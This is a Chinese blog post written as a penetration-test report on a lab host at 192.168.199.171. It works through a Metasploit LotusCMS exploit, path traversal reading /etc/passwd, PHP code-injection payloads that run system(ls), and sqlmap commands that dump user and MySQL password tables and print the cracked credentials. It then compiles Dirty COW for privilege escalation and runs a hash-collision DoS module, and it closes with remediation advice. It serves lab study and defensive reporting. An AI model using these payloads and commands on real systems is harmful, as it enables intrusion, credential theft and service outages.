渗透测试报告总结

Created at 2019-07-01 Updated at 2019-08-15 Category 漏洞渗透 Tag 渗透测试报告总结


渗透测试报告总结

目录
1.测试目的
2.渗透范围和测试主要内容
3.信息收集
4.渗透测试过程
4.1.目录测试
4.2.内容披露测试
4.3.弱口令测试
5.漏洞总结

  1. 测试目的
    通过实施针对性渗透,找出漏洞隐患,制定相应的安全措施与解决方案保障系
    统的安全运行
  2. 渗透范围和测试主要内容
    测试主机:192.168.199.171
    测试时间:2019.7.22
    测试说明:通过漏洞扫描和手动分析获取相关数据
    渗透方式:内网渗透
    此次渗透主要包括对象:真的所有的安全隐患和漏洞,
    通过端口,目录等进用弱口令,内容披露,msf模块利用等几个方面进行渗透测试。

  3. 信息收集
    此阶段中,渗透测试小组进行必要的信息收集,如 IP地址,软件版本信息,端口,等
    渗透工具:御剑 。 AppScan AWVS
  4. 1.端口收集
    22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
    80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suho
  5. 2.版本信息收集
    Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch Server at 192.168.199.171 Port 80
  6. 3.通过AppScan和御剑目录收集
    mAD9tf.png

    mADVns.png
  7. 渗透测试过程
    此阶段中,渗透测试根据第一阶段获取的信息对网络、系统进行渗透测试。
  8. 1通过扫描的目录进行访问排查,找出可利用的目录: http://192.168.199.171/index.php?
    访问出现以下后台登录界面,看标记的应该是名字之类的,可以搜一下看看有没有漏洞,我在
    kali上调用模块试一下。
    mADl3F.png
    先查看有什么模块
    mADYH1.png
    就一个模块,调用一下试试
    mAD03D.png
    添加受攻击IP,修改uri的为 /
    mADsud.png

    mAD5vQ.png
    运行真的进去了,这算是一个高危漏洞了。
    mArV2D.png
  9. 2.通过上网查看发现同样是这个还有一个文件披露漏洞,通过截断可以访问password。
    访问网页http://192.168.199.171/index.php,可以看出后面加上截断,密码已经爆露出来了。
    http://192.168.199.171/index.php?system=../../../../../../../../etc/passwd%00;
    mArGRS.png
  10. 3.PHP代码注入,通过AWVS扫出的高危漏洞。
    mAryzF.png

    mArhIx.png
    点击home,从AWVS中可以看到利用的POC
    http://192.168.199.171/index.php?page=${@print(md5(acunetix_wvs_security_test))}\

    mArIJK.png
    发现下面那段是用md5进行编码的,md5值对应的是63c19a6da79816b21429e5bb262daed8
    这里使用md5解密工具进行解密,https://www.somd5.com/
    解密出内容为:acunetix_wvs_security_test
    也可通过此方法来写system((ls))
    http://192.168.199.171/index.php?page=${@print(system(ls))}\

    mArHQe.png
    同样也可以使用phpinfo()这个函数
    http://192.168.199.171/index.php?page=${@print(phpinfo())}\

    mArxFP.png
  11. 4.测试http://192.168.199.239/phpmyadmin,访问出现phpmyadmin页面,经过测试发现该登录
    页面有弱口令漏洞,那么通过弱口令进入。
    mAsZF0.png

    mAs8T1.png

  12. 5手工注入http://192.168.199.239/gallery/ ,发现图片不显示,是因为hstos文件没有配置在本地虚拟机
    /etc/hstos里面添加。
    mAsUSO.png
    点击标记区域进入,在?后面添加or 1=1 页面发生了变化,说明可能有sql注入漏洞。
    mAs2p8.png

    mAsHhV.png
    然后使用sqlmap进行跑这个可能存在的注入点
    使用kali中的sqlmap,
    sqlmap -u “http://192.168.199.171/gallery/gallery.php?id=1^&sort=photoid" –dbs –cookie=”gallarific_vote_3=1; gallarific_vote_5=1; gallarific_vote_4=1; PHPSESSID=24f177e5cfc63063750f1eeef9362c54”
    mAsvnJ.png
    爆出三个数据库,分别是:gallery、information_schema、mysql
    sqlmap -u “http://192.168.199.171/gallery/gallery.php?id=1^&sort=photoid" -D gallery -T gallarific_users -C username,password –dump –cookie=”gallarific_vote_3=1; gallarific_vote_5=1; gallarific_vote_4=1; PHPSESSID=24f177e5cfc63063750f1eeef9362c54”
    mAyAje.png
    获取到gallery这个数据库中有username和password这两个表。
    sqlmap -u “http://192.168.199.171/gallery/gallery.php?id=1^&sort=photoid" -D mysql -T user -C User,Password –dump –cookie=”gallarific_vote_3=1; gallarific_vote_5=1; gallarific_vote_4=1; PHPSESSID=24f177e5cfc63063750f1eeef9362c54”
    mAyl38.png
    查看到mysql数据库中的user和password
    使用md5进行解密
    mA6SKg.png
    解密出root用户对应的密码是fuckeyou
    然后使用burpsuite进行sqlmap,使用burp拦截以下页面
    mA6EGV.png
    使用burp发送到sqlmap中,使用CO2进行sqlmap中选择如下图所示。
    mA6QaR.png

    mA6dZd.png
    成功爆出账号名和密码
    账号和密码分别是:
    dreg Mast3r
    loneferret starwars

    使用脏牛进行提权
    在3.6中获取了两个普通的账号和密码
    ssh进行登陆
    mA6cQS.png
    下载脏牛,放到/home/loneferret
    mA6hon.png
    使用gcc -pthread dirty.c -o dirty -lcrypt命令对dirty.c进行编译,生成一个dirty的可执行文件。
    执行 ./dirty ,即进行提权,并写入新的密码
    mA6OeJ.png

  13. 6.PHP Hash Collision denial of service DDoS攻击
  14. 查看模块
    search CVE-2011-4885
  15. 使用模块
    use auxiliary/dos/http/hashcollision_dos
    添加攻击目标IP
    set rhosts 192.168.199.171
    set target PHP
    run
    mAciOe.png
  16. 测试结果分析
  17. PHP代码注入漏洞
    风险等级: 中
    漏洞描述:用户可以通过PHP代码注入,对网站进行命令执行,获取一些信息
    漏洞位置: http://192.168.199.171/index.php
    整改建议:
    1、对一些重要命令进行限制
    2、对相关字段进行过滤
    2。文件包含漏洞
    风险等级: 中
    漏洞描述:用户可以通过使用文件包含的方法,包出网站的发布目录以及重要路径
    漏洞位置: http://192.168.199.171/index.php?system=Blog
    整改建议:
    1.关闭allow_url_fopen allow_url_include
    2.进行验证

3.LotusCMS后台管理漏洞
风险等级: 高
漏洞描述:通过该漏洞,可以获取shell并提权获得系统的最高权限
漏洞位置: http://192.168.199.171/style/comps/admin/login.phtml
整改建议:
更换一个新版本的更安全的

4.phpmyadmin弱口令漏洞
风险等级:中
漏洞描述:随便输入用户名,密码为空,既能进入
漏洞位置:http://192.168.199.171/style/comps/admin/login.phtml
整改建议:
更换一个新版本的更安全的
5.PHP Hash Collision denial of service DDoS攻击
风险等级: 高
漏洞描述:通过DDoS攻击,直接导致服务器死机
漏洞位置:http://192.168.199.171
整改建议:
控制POST数据的数量
在Web服务器层面进行处理,例如限制http请求body的大小和参数的数量等,这个是现在用的最多的临时处理方案

6.SQL注入漏洞
风险等级: 高
漏洞描述:借助sqlmap等工具,可以轻松的获取
漏洞位置: http://192.168.199.171/phpmyadmin
整改建议:
设置安全的用户密码
设置验证码辅助验证

Table of Content

  1. 渗透测试报告总结
Site by csy using Hexo & Random

Hide